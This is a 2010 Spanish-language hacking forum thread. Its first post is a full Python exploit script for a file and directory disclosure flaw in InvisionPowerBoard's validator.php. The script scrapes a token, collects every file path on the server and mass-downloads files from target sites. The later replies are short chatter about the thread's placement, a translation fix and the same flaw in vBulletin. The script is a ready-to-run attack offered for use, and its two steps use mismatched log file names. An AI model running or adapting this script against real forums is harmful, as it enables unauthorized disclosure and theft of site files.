elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]  (Leído 8,940 veces)
c0de.breaker

Desconectado Desconectado

Mensajes: 25


insecurity.ro


Ver Perfil WWW
InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« en: 24 Enero 2010, 23:02 pm »



Código:
#! /usr/bin/env python3.1

################################################################
#          _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#   | | | |__) | |_) |                           #
#   | | |  ___/|  _ <                            #
# _| |_| |    | |_) |                           #
#    |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################


import os, sys, urllib.request, urllib.parse, threading


def main():
    logo = """
\t |---------------------------------------------------------------|
\t |                      _____ _____  ____    (TM)                |
\t |                     |_   _|  __ \|  _ \                       |
\t |                       | | | |__) | |_) |                      |
\t |                       | | |  ___/|  _ <                       |
\t |                      _| |_| |    | |_) |                      |
\t |                     |_____|_|    |____/                       |
\t |                                                               |
\t |                                                               |
\t |                  IPB Full Disclosure expl0it                  |
\t |                      Written by cmiN                          |
\t |              Vulnerability discovered by TinKode              |
\t |                                                               |
\t |                                                               |
\t |         Visit: www.insecurity.ro & www.darkc0de.com           |
\t |---------------------------------------------------------------|
"""
    usage = """
         |---------------------------------------------------------------|
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           |
         |        ipbfd.py download *.zip -> all                         |
         |        ipbfd.py download name.jpg -> one                      |
         |---------------------------------------------------------------|"""
    if sys.platform in ("linux", "linux2"):
        clearing = "clear"
    else:
        clearing = "cls"
    os.system(clearing)
    print(logo)
    args = sys.argv
    if len(args) == 3:
        try:
            print("Please wait...")
            if args[1] == "scan":
                extract_parse_save(args[2].strip("/"))
            elif args[1] == "download":
                download_data(args[2])
        except Exception as message:
            print("An error occurred: {}".format(message))
        except:
            print("Unknown error.")
        else:
            print("Ready!")
    else:
        print(usage)
    input()


def extract_parse_save(url):
    print("[+]Extracting content...")
    hurl = url + "/validator.php"
    with urllib.request.urlopen(hurl) as usock:
        source = usock.read().decode()
    print("[+]Finding token...")
    word = "validate('"
    index = source.find(word)
    if index != -1:
        source = source[index + len(word):]
        value = source[:source.index("'")]
        hurl = url + "/validator.php?op={}".format(value)
    else:
        print("[!]Token not found.")
    print("[+]Obtaining paths...")
    with urllib.request.urlopen(hurl) as usock:
        lastk, lastv = None, None
        dictionary = dict()
        for line in usock:
            line = line.decode()
            index = line.find("<td>")
            if index != -1:
                lastk = line[index + 4:line.index("</td>")].strip(" ").strip("&nbsp;")
            index = line.find("<strong>")
            if index != -1:
                lastv = line[index + 8:line.index("</strong>")].strip(" ")
            if lastk != None and lastv != None:
                index = lastk.rfind(".")
                if index in (-1, 0):
                    lastk = "[other] {}".format(lastk)
                else:
                    lastk = "[{}] {}".format(lastk[index + 1:], lastk)
                dictionary[lastk] = lastv
                lastk, lastv = None, None
    print("[+]Organizing and saving paths...")
    with open("IPBlogs.txt", "w") as fout:
        fout.write(url + "\n")
        keys = sorted(dictionary.keys())
        for key in keys:
            fout.write("{} ({})\n".format(key, dictionary[key]))


def download_data(files):
    print("[+]Searching and downloading files...")
    mthreads = 50
    with open("vBlogs.txt", "r") as fin:
        url = fin.readline().strip("\n").strip("/")
        if files.find("*") == -1:
            hurl = url + "/" + files.strip("/")
            Download(hurl).start()
        else:
            ext = files[files.rindex(".") + 1:]
            for line in fin:
                pieces = line.strip("\n").split(" ")
                if pieces[0].count(ext) == 1:
                    upath = pieces[1]
                    hurl = url + "/" + upath.strip("/")
                    while threading.active_count() > mthreads:
                        pass
                    Download(hurl).start()
    while threading.active_count() > 1:
        pass


class Download(threading.Thread):

    def __init__(self, url):
        threading.Thread.__init__(self)
        self.url = url

    def run(self):
        try:
            with urllib.request.urlopen(self.url) as usock:
                data = usock.read()
                uparser = urllib.parse.urlparse(usock.geturl())
                pieces = uparser.path.split("/")
                fname = pieces[len(pieces) - 1]
                with open(fname, "wb") as fout:
                    fout.write(data)
        except:
            pass


if __name__ == "__main__":
    main()

You must have python 3.1 to work!
En línea

~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #1 en: 24 Enero 2010, 23:22 pm »

Esto deviria ir en Bug y Exploit.
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #2 en: 24 Enero 2010, 23:28 pm »

No, esta bien aqui, al parecer es la misma falla que afecta a al vBulletin.

Es comun que cuando ves una falla en un CMS también aparezcan en otro CMS

Saludos


No, it is well placed here, apparently is the same flaw that affects the vBulletin.
It is common that a flaw seen into a CMS also appears in other CMS.

regards

« Última modificación: 25 Enero 2010, 22:04 pm por Anon » En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #3 en: 25 Enero 2010, 14:33 pm »




No, this well here, apparently is the same flaw affecting the vBulletin.

It is common that when you see a fault in a CMS also appear in other CMS

Regards



No, it is well placed here, apparently is the same flaw that affects the vBulletin.
It is common that a flaw seen into a CMS also appears in other CMS.

regards




espero no molestar por tomarme la libertad de corregirte, un saludo
En línea

Colaboraciones:
1 2
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.606


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #4 en: 25 Enero 2010, 17:56 pm »

Y la pregunta del millon de dolares... porqué ipboard y vbulletín tienen el mismo archivo vulnerable?
buscaré mas info porque parece que esto da para rato.
En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #5 en: 25 Enero 2010, 22:04 pm »

Y la pregunta del millon de dolares... porqué ipboard y vbulletín tienen el mismo archivo vulnerable?

Jaja juralo que yo me pregunte lo mismo.

Saludos



espero no molestar por tomarme la libertad de corregirte, un saludo

Nunca es molestia :D aprender de los que saben, con eso de que yo no he estudiado ingles, la verdad que si me hace falta.



En línea

c0de.breaker

Desconectado Desconectado

Mensajes: 25


insecurity.ro


Ver Perfil WWW
Re: InvisionPowerBoard [IPB] (validator.php) full disclosure exploit [python]
« Respuesta #6 en: 25 Enero 2010, 22:48 pm »

Because are nulled by the same "team" :D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
La Defensoría del Pueblo - República de Colombia [Full Source Disclosure]
Nivel Web
Shell Root 3 5,289 Último mensaje 20 Diciembre 2010, 17:53 pm
por bomba1990
Fallo de seguridad en routers COMTREND - FULL DISCLOSURE: WPA al descubierto
Hacking Wireless
ChimoC 2 15,140 Último mensaje 15 Mayo 2011, 11:10 am
por BgCRaCK
[Full-disclosure] D.O.S en CBM (Control del Ciber) kml reverser
Hacking
djkamal 0 8,080 Último mensaje 5 Septiembre 2011, 18:20 pm
por djkamal
Duda Jquery validator
Desarrollo Web
ElInquisidor 1 1,622 Último mensaje 24 Febrero 2017, 23:59 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines